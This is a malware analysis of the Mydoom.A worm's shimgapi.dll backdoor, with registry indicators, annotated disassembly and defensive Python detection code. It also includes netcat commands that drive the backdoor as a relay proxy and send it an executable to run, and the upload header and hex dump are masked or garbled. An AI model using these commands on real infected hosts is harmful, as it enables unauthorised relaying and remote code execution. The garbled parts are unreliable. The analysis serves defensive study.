Analysis of shimgapi.dll of Mydoom.A

Source: Internet
Author: User
The backdoor of Mydoom.A exists as a DLL. By modifying the corresponding registry key value, it gets itself loaded into the process space of Windows Explorer (explorer.exe).

Under normal circumstances, the registry looks like this:
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InprocServer32
(Default)         REG_EXPAND_SZ    %SystemRoot%\system32\webcheck.dll
ThreadingModel    REG_SZ           Apartment

Mydoom.A replaces %SystemRoot%\system32\webcheck.dll with its own shimgapi.dll.
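The registry change above is the host-side indicator of this infection. As an added example (not part of the original analysis), the following Python parses `reg query` output for that key and reports whether the InprocServer32 default value still points at webcheck.dll. The two sample outputs are constructed here; the exact path the worm writes for shimgapi.dll is an assumption, only the file name comes from the analysis.

```python
import re
from typing import Optional, Tuple

# CLSID whose InprocServer32 value the worm repoints (from the analysis above).
WEBCHECK_CLSID = "{E6FB5E20-DE35-11CF-9C87-00AA005127ED}"

# Value a clean machine carries under that key, already case-folded.
EXPECTED_DLL = r"%systemroot%\system32\webcheck.dll"

# Constructed sample of `reg query` output from a clean host.
CLEAN_OUTPUT = r"""
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InprocServer32
    (Default)         REG_EXPAND_SZ    %SystemRoot%\system32\webcheck.dll
    ThreadingModel    REG_SZ           Apartment
"""

# Constructed sample from an infected host. The directory is an assumption;
# the file name shimgapi.dll is the one named in the analysis.
INFECTED_OUTPUT = r"""
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InprocServer32
    (Default)         REG_EXPAND_SZ    %SystemRoot%\system32\shimgapi.dll
    ThreadingModel    REG_SZ           Apartment
"""

# Matches the "(Default)" line of reg query output and captures its data.
VALUE_RE = re.compile(r"^\s*\(Default\)\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$", re.MULTILINE)


def inproc_default_value(reg_output: str) -> Optional[str]:
    """Return the (Default) data of the InprocServer32 key, or None if absent."""
    if WEBCHECK_CLSID not in reg_output:
        return None
    match = VALUE_RE.search(reg_output)
    return match.group(1) if match else None


def normalize_path(value: str) -> str:
    """Case-fold and strip quotes so %SystemRoot%\System32\WebCheck.dll compares equal."""
    return value.strip().strip('"').lower()


def check_webcheck_clsid(reg_output: str) -> Tuple[str, Optional[str]]:
    """Classify the key: ('ok', path), ('hijacked', path) or ('missing', None)."""
    value = inproc_default_value(reg_output)
    if value is None:
        return ("missing", None)
    if normalize_path(value) == EXPECTED_DLL:
        return ("ok", value)
    return ("hijacked", value)


if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_OUTPUT), ("infected", INFECTED_OUTPUT)):
        print(label, check_webcheck_clsid(sample))
```

This only inspects the key value. If the worm had overwritten webcheck.dll in place instead of pointing the key elsewhere, the value would still read "ok", so the file itself should be compared against a known-good copy or hash as well.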

By default, the shimgapi.dll backdoor listens on port 3127. If that port is already in use, it moves up one port at a time, but never above 3198.

The backdoor provides two functions:
1. Acting as a port-forwarding proxy
2. Acting as a backdoor that receives an uploaded program and executes it

Related code:
.text:7e1a1c44 sub_7e1a1c44 proc near            ; DATA XREF: start+19 o
.text:7e1a1c44
.text:7e1a1c44 wsadata = WSAData ptr -190h
.text:7e1a1c44
.text:7e1a1c44     sub     esp, 190h
.text:7e1a1c4a     push    esi
.text:7e1a1c4b     push    edi
.text:7e1a1c4c     call    sub_7e1a1a1f
.text:7e1a1c51     lea     eax, [esp+198h+wsadata]
.text:7e1a1c55     push    eax                     ; lpWSAData
.text:7e1a1c56     push    2                       ; wVersionRequested
.text:7e1a1c58     call    ds:WSAStartup
.text:7e1a1c5e     call    address
.text:7e1a1c63     mov     edi, ds:Sleep
.text:7e1a1c69     mov     esi, 0C37h              ; start listening on port 3127
.text:7e1a1c6e
.text:7e1a1c6e loc_7e1a1c6e:                       ; CODE XREF: sub_7e1a1c44+50 j
.text:7e1a1c6e     push    3
.text:7e1a1c70     push    esi
.text:7e1a1c71     call    sub_7e1a1b52            ; bind subroutine
.text:7e1a1c76     pop     ecx
.text:7e1a1c77     pop     ecx
.text:7e1a1c78     push    400h                    ; dwMilliseconds
.text:7e1a1c7d     call    edi                     ; Sleep
.text:7e1a1c7f     cmp     esi, 0C7Eh              ; port must not exceed 3198
.text:7e1a1c85     jle     short loc_7e1a1c93
.text:7e1a1c87     push    800h                    ; dwMilliseconds
.text:7e1a1c8c     call    edi                     ; Sleep
.text:7e1a1c8e     mov     esi, 0C37h              ; past 3198: reset to 3127
.text:7e1a1c93
.text:7e1a1c93 loc_7e1a1c93:                       ; CODE XREF: sub_7e1a1c44+41 j
.text:7e1a1c93     inc     esi                     ; move to the next port and try to bind again
.text:7e1a1c94     jmp     short loc_7e1a1c6e
.text:7e1a1c94 sub_7e1a1c44 endp

After a connection arrives on port 3127, if the first byte received is \x04 the port-forwarding path is taken: it checks that the second byte is 0x01, takes bytes 5 to 8 as the destination IP address and bytes 3 to 4 as the destination port, connects to that destination and relays data between it and the current socket.

For example, we use \x00\x6e\xc0\xa8\x01\x0b as the connection command, where \x00\x6e is port 110 and \xc0\xa8\x01\x0b is 192.168.1.11.

# printf "\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127
Z+OK Microsoft Exchange Server 2003 POP3 server version 6.5.6944.0 ready.

We can see that the session with port 110 of 192.168.1.11 is relayed back to us. Note that a short block of data precedes the returned banner. Test again:

# printf "\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127 | xxd -g 1
0000000: 04 5a 00 6e c0 a8 01 0b 2b 4f 4b 20 4d 69 63 72  .Z.n....+OK Micr
0000010: 6f 73 6f 66 74 20 45 78 63 68 61 6e 67 65 20 53  osoft Exchange S
0000020: 65 72 76 65 72 20 32 30 30 33 20 50 4f 50 33 20  erver 2003 POP3 
0000030: 73 65 72 76 65 72 20 76 65 72 73 69 6f 6e 20 36  server version 6
0000040: 2e 35 2e 36 39 34 34 2e 30 20 28 64 63 2e 69 6e  .5.6944.0 (dc.in

Now send a command to connect to port 98, on which nothing is listening:
# printf "\x04\x01\x00\x62\xc0\xa8\x01\x0b\x00" | nc 192.168.7.33 3127 | xxd -g 1
0000000: 04 5b 00 62 c0 a8 01 0b                          .[.b....

Clearly that block of data reports the connection status: 04 5A means the connection succeeded and 04 5B means it failed, and the six bytes that follow are the connection command that was sent. The worm author presumably designed this so that a client can easily judge the outcome.
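The exchange just described is easy to spot passively on the wire. As an added example (not code from the original analysis), the following Python decodes the 8-byte command and the 8-byte status reply from a captured session and emits an alert line when a connection to the 3127-3198 range carries them. The sample bytes are constructed to reproduce the two exchanges shown above. The 0x5A and 0x5B status codes are the "request granted" and "request rejected" codes of the SOCKS4 protocol, which this backdoor imitates with a leading 0x04 instead of SOCKS4's 0x00 in the reply.

```python
import ipaddress
import struct
from typing import Optional

# Listening range of the shimgapi.dll backdoor, from the analysis above.
FIRST_PORT, LAST_PORT = 3127, 3198


def is_backdoor_port(port: int) -> bool:
    """True for any port the backdoor may bind (3127 first, then upward to 3198)."""
    return FIRST_PORT <= port <= LAST_PORT


def decode_forward_request(data: bytes) -> Optional[dict]:
    """Decode the client command: 04 01 <port, 2 bytes big-endian> <IPv4, 4 bytes>,
    optionally followed by extra bytes up to a terminating 0x00."""
    if len(data) < 8 or data[0] != 0x04 or data[1] != 0x01:
        return None
    (port,) = struct.unpack("!H", data[2:4])
    return {
        "port": port,
        "ip": str(ipaddress.IPv4Address(data[4:8])),
        "trailer": data[8:],
    }


def decode_status_reply(data: bytes) -> Optional[dict]:
    """Decode the backdoor's reply: 04 5A (connected) or 04 5B (failed), followed by
    the echoed port and IP; anything after byte 8 is data relayed from the target."""
    if len(data) < 8 or data[0] != 0x04 or data[1] not in (0x5A, 0x5B):
        return None
    (port,) = struct.unpack("!H", data[2:4])
    return {
        "connected": data[1] == 0x5A,
        "port": port,
        "ip": str(ipaddress.IPv4Address(data[4:8])),
        "relayed": data[8:],
    }


def describe_session(dst_port: int, client_to_server: bytes,
                     server_to_client: bytes) -> Optional[str]:
    """Return an alert line for a captured TCP session, or None if it does not match."""
    if not is_backdoor_port(dst_port):
        return None
    request = decode_forward_request(client_to_server)
    reply = decode_status_reply(server_to_client)
    if request is None or reply is None:
        return None
    outcome = "connected" if reply["connected"] else "failed"
    return "mydoom-proxy dst=%d relay_to=%s:%d status=%s relayed_bytes=%d" % (
        dst_port, request["ip"], request["port"], outcome, len(reply["relayed"]))


# Constructed samples reproducing the two exchanges shown in the analysis.
SUCCESS_REQUEST = b"\x04\x01\x00\x6e\xc0\xa8\x01\x0b\x00"
SUCCESS_REPLY = (b"\x04\x5a\x00\x6e\xc0\xa8\x01\x0b"
                 b"+OK Microsoft Exchange Server 2003 POP3 server version 6.5.6944.0 ready.\r\n")
FAILED_REQUEST = b"\x04\x01\x00\x62\xc0\xa8\x01\x0b\x00"
FAILED_REPLY = b"\x04\x5b\x00\x62\xc0\xa8\x01\x0b"

if __name__ == "__main__":
    print(describe_session(3127, SUCCESS_REQUEST, SUCCESS_REPLY))
    print(describe_session(3127, FAILED_REQUEST, FAILED_REPLY))
```

The destination port check matters: a plain SOCKS4 proxy on 1080 produces a similar request, so the combination of the 3127-3198 range with the 04 5A / 04 5B reply is what makes the match specific to this backdoor.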

Related code:
.text:7e1a17f5
.text:7e1a17f5 loc_7e1a17f5:                       ; CODE XREF: sub_7e1a17ba+2B j
.text:7e1a17f5     cmp     byte ptr [ebp-1], 4     ; is the first byte 0x04?
.text:7e1a17f9     push    ebx
.text:7e1a17fa     jnz     loc_7e1a18b7            ; if not 0x04, go to the failure path and exit
.text:7e1a1800     xor     ebx, ebx
.text:7e1a1802
.text:7e1a1802 loc_7e1a1802:                       ; CODE XREF: sub_7e1a17ba+65 j
.text:7e1a1802     push    0                       ; flags
.text:7e1a1804     push    8
.text:7e1a1806     pop     eax
.text:7e1a1807     sub     eax, ebx
.text:7e1a1809     push    eax                     ; len
.text:7e1a180a     lea     eax, [ebp+ebx+Buf]
.text:7e1a180e     push    eax                     ; buf
.text:7e1a180f     push    [ebp+s]                 ; s
.text:7e1a1812     call    esi                     ; recv
.text:7e1a1814     test    eax, eax
.text:7e1a1816     jl      short loc_7e1a1823
.text:7e1a1818     jz      short loc_7e1a1825
.text:7e1a181a     add     ebx, eax
.text:7e1a181c     cmp     ebx, 8                  ; fewer than 8 bytes received so far?
.text:7e1a181f     jl      short loc_7e1a1802      ; keep calling recv until 8 bytes are in
.text:7e1a1821     jmp     short loc_7e1a1825
.text:7e1a1823 ; ---------------------------------------------------------------------------
.text:7e1a1823
.text:7e1a1823 loc_7e1a1823:                       ; CODE XREF: sub_7e1a17ba+5C j
.text:7e1a1823     mov     ebx, eax
.text:7e1a1825
.text:7e1a1825 loc_7e1a1825:                       ; CODE XREF: sub_7e1a17ba+5E j
.text:7e1a1825                                     ; sub_7e1a17ba+67 j
.text:7e1a1825     cmp     ebx, 8
.text:7e1a1828     jnz     loc_7e1a1907
.text:7e1a182e     jmp     short loc_7e1a1836
.text:7e1a1830 ; ---------------------------------------------------------------------------
.text:7e1a1830
.text:7e1a1830 loc_7e1a1830:                       ; CODE XREF: sub_7e1a17ba+8C j
.text:7e1a1830     cmp     [ebp+var_2], 0          ; is the byte after the 8-byte header 0x00, i.e. was only the header sent?
.text:7e1a1834     jz      short loc_7e1a184a
.text:7e1a1836
.text:7e1a1836 loc_7e1a1836:                       ; CODE XREF: sub_7e1a17ba+74 j
.text:7e1a1836     push    0
.text:7e1a1838     lea     eax, [ebp+var_2]
.text:7e1a183b     push    1
.text:7e1a183d     push    eax
.text:7e1a183e     push    [ebp+s]
.text:7e1a1841     call    esi                     ; recv one byte at a time
.text:7e1a1843     cmp     eax, 1
.text:7e1a1846     jz      short loc_7e1a1830
.text:7e1a1848     jmp     short loc_7e1a18b7
.text:7e1a184a ; ---------------------------------------------------------------------------
.text:7e1a184a
.text:7e1a184a loc_7e1a184a:                       ; CODE XREF: sub_7e1a17ba+7A j
.text:7e1a184a     cmp     [ebp+Buf], 4            ; check again that the first byte is 0x04
.text:7e1a184e     jnz     short loc_7e1a18b7
.text:7e1a1850     cmp     byte ptr [ebp-0Fh], 1   ; the second byte must be 0x01, otherwise exit
.text:7e1a1854     jnz     short loc_7e1a18b7
.text:7e1a1856     cmp     [ebp+hostlong], 0       ; are the last four bytes (the IP address) all zero?
.text:7e1a185a     jz      short loc_7e1a187c
.text:7e1a185c     push    [ebp+hostlong]          ; hostlong
.text:7e1a185f     call    ds:htonl
.text:7e1a1865     test    eax, 0FFFFFF00h         ; check the IP address against the mask 0FFFFFF00h (255.255.255.0)
.text:7e1a186a     jnz     short loc_7e1a187c
.text:7e1a186c     push    [ebp+s]
.text:7e1a186f     lea     ebx, [ebp+hostlong]
.text:7e1a1872     call    sub_7e1a1664
.text:7e1a1877     test    eax, eax
.text:7e1a1879     pop     ecx
.text:7e1a187a     jnz     short loc_7e1a18b7
.text:7e1a187c
.text:7e1a187c loc_7e1a187c:                       ; CODE XREF: sub_7e1a17ba+A0 j
.text:7e1a187c                                     ; sub_7e1a17ba+B0 j
.text:7e1a187c     mov     ax, [ebp-0Eh]           ; bytes 3 and 4 are the destination port
.text:7e1a1880     push    6                       ; protocol
.text:7e1a1882     mov     word ptr [ebp+name.sa_data], ax
.text:7e1a1886     mov     eax, [ebp+hostlong]
.text:7e1a1889     push    1                       ; type
.text:7e1a188b     push    2                       ; af
.text:7e1a188d     mov     [ebp+name.sa_family], 2
.text:7e1a1893     mov     dword ptr [ebp+name.sa_data+2], eax
.text:7e1a1896     call    ds:socket
.text:7e1a189c     cmp     eax, 0FFFFFFFFh
.text:7e1a189f     mov     [ebp+var_8], eax
.text:7e1a18a2     jz      short loc_7e1a18b7
.text:7e1a18a4     lea     eax, [ebp+name]
.text:7e1a18a7     push    10h                     ; namelen
.text:7e1a18a9     push    eax                     ; name
.text:7e1a18aa     push    [ebp+var_8]             ; s
.text:7e1a18ad     call    ds:connect
.text:7e1a18b3     test    eax, eax
.text:7e1a18b5     jz      short loc_7e1a18d2
.text:7e1a18b7
.text:7e1a18b7 loc_7e1a18b7:                       ; CODE XREF: sub_7e1a17ba+40 j
.text:7e1a18b7                                     ; sub_7e1a17ba+8E j ...
.text:7e1a18b7     push    0                       ; flags
.text:7e1a18b9     lea     eax, [ebp+Buf]
.text:7e1a18bc     push    8                       ; len
.text:7e1a18be     push    eax                     ; buf
.text:7e1a18bf     push    [ebp+s]                 ; s
.text:7e1a18c2     mov     [ebp+Buf], 4
.text:7e1a18c6     mov     byte ptr [ebp-0Fh], 5Bh ; connection failed: reply 0x5B
.text:7e1a18ca     call    ds:send
.text:7e1a18d0     jmp     short loc_7e1a18f8
.text:7e1a18d2 ; ---------------------------------------------------------------------------
.text:7e1a18d2
.text:7e1a18d2 loc_7e1a18d2:                       ; CODE XREF: sub_7e1a17ba+FB j
.text:7e1a18d2     push    0                       ; flags
.text:7e1a18d4     lea     eax, [ebp+Buf]
.text:7e1a18d7     push    8                       ; len
.text:7e1a18d9     push    eax                     ; buf
.text:7e1a18da     push    [ebp+s]                 ; s
.text:7e1a18dd     mov     [ebp+Buf], 4
.text:7e1a18e1     mov     byte ptr [ebp-0Fh], 5Ah ; connection succeeded: reply 0x5A
.text:7e1a18e5     call    ds:send
.text:7e1a18eb     push    [ebp+var_8]
.text:7e1a18ee     push    [ebp+s]
.text:7e1a18f1     call    sub_7e1a16d3            ; relay data between the two sockets
.text:7e1a18f6     pop     ecx
.text:7e1a18f7     pop     ecx

If the first byte received is \xqq and bytes 2 to 5 are \xpp, all data from the sixth byte onward is received and saved to a temporary file, which is run with CreateProcess and deleted after the program exits.

That is to say, as long as we prepend the five-byte header \xqq\xpp to any executable file and send it to port 3127 of a machine infected with Mydoom.A, the file will be executed on that system. I added the magic header to the system calculator program with UltraEdit and sent it with nc.

# xxd -g 1 -l 64 calc.exe
0000000: QQ pp 4D 5A 90 00 00 00 00 00 04 00 00 ...... MZ .........
0000010: 00 ff 00 00 B8 00 00 00 00 00 40 00 00 .............@..
0000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

# nc 192.168.7.33 3127 < calc.exe
^C

Related code:

Omitted
